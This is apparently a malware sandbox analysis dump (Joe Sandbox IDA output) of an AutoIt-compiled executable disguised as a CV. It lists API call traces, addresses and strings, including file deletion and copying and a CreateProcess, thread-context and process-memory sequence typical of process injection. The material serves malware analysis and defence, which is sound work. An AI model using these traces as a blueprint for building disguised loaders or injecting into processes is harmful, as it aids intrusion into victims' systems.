                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: D
                                                                                        • API String ID: 3964851224-275895
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038E959
                                                                                        • timeGetTime.WINMM ref: 0038EBFA
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038ED2E
                                                                                        • TranslateMessage.USER32(?), ref: 0038ED3F
                                                                                        • DispatchMessageW.USER32(?), ref: 0038ED4A
                                                                                        • LockWindowUpdate.USER32(00000000), ref: 0038ED79
                                                                                        • DestroyWindow.USER32 ref: 0038ED85
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038ED9F
                                                                                        • Sleep.KERNEL32(0000000A), ref: 003F5270
                                                                                        • TranslateMessage.USER32(?), ref: 003F59F7
                                                                                        • DispatchMessageW.USER32(?), ref: 003F5A05
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003F5A19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 2641332412-570651680
                                                                                        APIs
                                                                                        • ___createFile.LIBCMT ref: 003B5EC3
                                                                                        • ___createFile.LIBCMT ref: 003B5F04
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003B5F2D
                                                                                        • __dosmaperr.LIBCMT ref: 003B5F34
                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 003B5F47
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003B5F6A
                                                                                        • __dosmaperr.LIBCMT ref: 003B5F73
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003B5F7C
                                                                                        • __set_osfhnd.LIBCMT ref: 003B5FAC
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B6016
                                                                                        • __close_nolock.LIBCMT ref: 003B603C
                                                                                        • __chsize_nolock.LIBCMT ref: 003B606C
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B607E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B6176
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B618B
                                                                                        • __close_nolock.LIBCMT ref: 003B61EB
                                                                                          • Part of subcall function 003AEA9C: CloseHandle.KERNELBASE(00000000,0042EEF4,00000000,?,003B6041,0042EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003AEAEC
                                                                                          • Part of subcall function 003AEA9C: GetLastError.KERNEL32(?,003B6041,0042EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003AEAF6
                                                                                          • Part of subcall function 003AEA9C: __free_osfhnd.LIBCMT ref: 003AEB03
                                                                                          • Part of subcall function 003AEA9C: __dosmaperr.LIBCMT ref: 003AEB25
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __lseeki64_nolock.LIBCMT ref: 003B620D
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003B6342
                                                                                        • ___createFile.LIBCMT ref: 003B6361
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003B636E
                                                                                        • __dosmaperr.LIBCMT ref: 003B6375
                                                                                        • __free_osfhnd.LIBCMT ref: 003B6395
                                                                                        • __invoke_watson.LIBCMT ref: 003B63C3
                                                                                        • __wsopen_helper.LIBCMT ref: 003B63DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 003CFA96
                                                                                        • _wcschr.LIBCMT ref: 003CFAA4
                                                                                        • _wcscpy.LIBCMT ref: 003CFABB
                                                                                        • _wcscat.LIBCMT ref: 003CFACA
                                                                                        • _wcscat.LIBCMT ref: 003CFAE8
                                                                                        • _wcscpy.LIBCMT ref: 003CFB09
                                                                                        • __wsplitpath.LIBCMT ref: 003CFBE6
                                                                                        • _wcscpy.LIBCMT ref: 003CFC0B
                                                                                        • _wcscpy.LIBCMT ref: 003CFC1D
                                                                                        • _wcscpy.LIBCMT ref: 003CFC32
                                                                                        • _wcscat.LIBCMT ref: 003CFC47
                                                                                        • _wcscat.LIBCMT ref: 003CFC59
                                                                                        • _wcscat.LIBCMT ref: 003CFC6E
                                                                                          • Part of subcall function 003CBFA4: _wcscmp.LIBCMT ref: 003CC03E
                                                                                          • Part of subcall function 003CBFA4: __wsplitpath.LIBCMT ref: 003CC083
                                                                                          • Part of subcall function 003CBFA4: _wcscpy.LIBCMT ref: 003CC096
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0A9
                                                                                          • Part of subcall function 003CBFA4: __wsplitpath.LIBCMT ref: 003CC0CE
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0E4
                                                                                          • Part of subcall function 003CBFA4: _wcscat.LIBCMT ref: 003CC0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$t2C
                                                                                        • API String ID: 2955681530-1673348803

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00383F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00383FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00383FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00383FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00384004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00384013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 003CBDB4: __time64.LIBCMT ref: 003CBDBE
                                                                                          • Part of subcall function 00384517: _fseek.LIBCMT ref: 0038452F
                                                                                        • __wsplitpath.LIBCMT ref: 003CC083
                                                                                          • Part of subcall function 003A1DFC: __wsplitpath_helper.LIBCMT ref: 003A1E3C
                                                                                        • _wcscpy.LIBCMT ref: 003CC096
                                                                                        • _wcscat.LIBCMT ref: 003CC0A9
                                                                                        • __wsplitpath.LIBCMT ref: 003CC0CE
                                                                                        • _wcscat.LIBCMT ref: 003CC0E4
                                                                                        • _wcscat.LIBCMT ref: 003CC0F7
                                                                                        • _wcscmp.LIBCMT ref: 003CC03E
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC65D
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003CC2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003CC338
                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003CC34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003CC35F
                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003CC371
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2378138488-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 003837B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 003837DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00383800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0038380B
                                                                                        • CreatePopupMenu.USER32 ref: 0038381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 0038382E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00383E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00383E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00383E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00383EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00383EC2
                                                                                          • Part of subcall function 00384024: LoadImageW.USER32(00380000,00000063,00000001,00000010,00000010,00000000), ref: 00384048
                                                                                        • RegisterClassExW.USER32(?), ref: 00383F30
                                                                                          • Part of subcall function 00383F53: GetSysColorBrush.USER32(0000000F), ref: 00383F86
                                                                                          • Part of subcall function 00383F53: RegisterClassExW.USER32(00000030), ref: 00383FB0
                                                                                          • Part of subcall function 00383F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383FC1
                                                                                          • Part of subcall function 00383F53: InitCommonControlsEx.COMCTL32(?), ref: 00383FDE
                                                                                          • Part of subcall function 00383F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00383FEE
                                                                                          • Part of subcall function 00383F53: LoadIconW.USER32(000000A9), ref: 00384004
                                                                                          • Part of subcall function 00383F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00384013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 019FC6D9
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 019FC8FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00384A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003F41DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003F421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003F4249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1158 3836b8-383728 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003836E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 0038371B
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 00383724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1263 19fc3a8-19fc4fe call 19f9ff8 call 19fc298 CreateFileW 1270 19fc505-19fc515 1263->1270 1271 19fc500 1263->1271 1274 19fc51c-19fc536 VirtualAlloc 1270->1274 1275 19fc517 1270->1275 1272 19fc5b5-19fc5ba 1271->1272 1276 19fc53a-19fc551 ReadFile 1274->1276 1277 19fc538 1274->1277 1275->1272 1278 19fc555-19fc58f call 19fc2d8 call 19fb298 1276->1278 1279 19fc553 1276->1279 1277->1272 1284 19fc5ab-19fc5b3 ExitProcess 1278->1284 1285 19fc591-19fc5a6 call 19fc328 1278->1285 1279->1272 1284->1272 1285->1284
                                                                                        APIs
                                                                                          • Part of subcall function 019FC298: Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 019FC4F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: S9QGZGQ44JJHI9OSVB2OTAPRKK0QL
                                                                                        • API String ID: 2694422964-3866275458

                                                                                        APIs
                                                                                          • Part of subcall function 00385374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00441148,?,003861FF,?,00000000,00000001,00000000), ref: 00385392
                                                                                          • Part of subcall function 003849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00384A1D
                                                                                        • _wcscat.LIBCMT ref: 003F2D80
                                                                                        • _wcscat.LIBCMT ref: 003F2DB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                        • String ID: 8!D$\$\Include\
                                                                                        • API String ID: 3592542968-342886951
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0038522F
                                                                                        • _wcscpy.LIBCMT ref: 00385283
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00385293
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003F3CB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 1053898822-1585850449
                                                                                        APIs
                                                                                          • Part of subcall function 003841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003839FE,?,00000001), ref: 003841DB
                                                                                        • _free.LIBCMT ref: 003F36B7
                                                                                        • _free.LIBCMT ref: 003F36FE
                                                                                          • Part of subcall function 0038C833: __wsplitpath.LIBCMT ref: 0038C93E
                                                                                          • Part of subcall function 0038C833: _wcscpy.LIBCMT ref: 0038C953
                                                                                          • Part of subcall function 0038C833: _wcscat.LIBCMT ref: 0038C968
                                                                                          • Part of subcall function 0038C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0038C978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 805182592-1757145024
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003F3725
                                                                                        • GetOpenFileNameW.COMDLG32 ref: 003F376F
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                          • Part of subcall function 003840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003840C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X$t3C
                                                                                        • API String ID: 3777226403-2841116392
                                                                                        APIs
                                                                                        • __getstream.LIBCMT ref: 003A34FE
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 003A3539
                                                                                        • __wopenfile.LIBCMT ref: 003A3549
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                        • String ID: <G
                                                                                        • API String ID: 1820251861-2138716496
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0039D28B,SwapMouseButtons,00000004,?), ref: 0039D2BC
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0039D28B,SwapMouseButtons,00000004,?,?,?,?,0039C865), ref: 0039D2DD
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,0039D28B,SwapMouseButtons,00000004,?,?,?,?,0039C865), ref: 0039D2FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 019FBA53
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 019FBAE9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019FBB0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        APIs
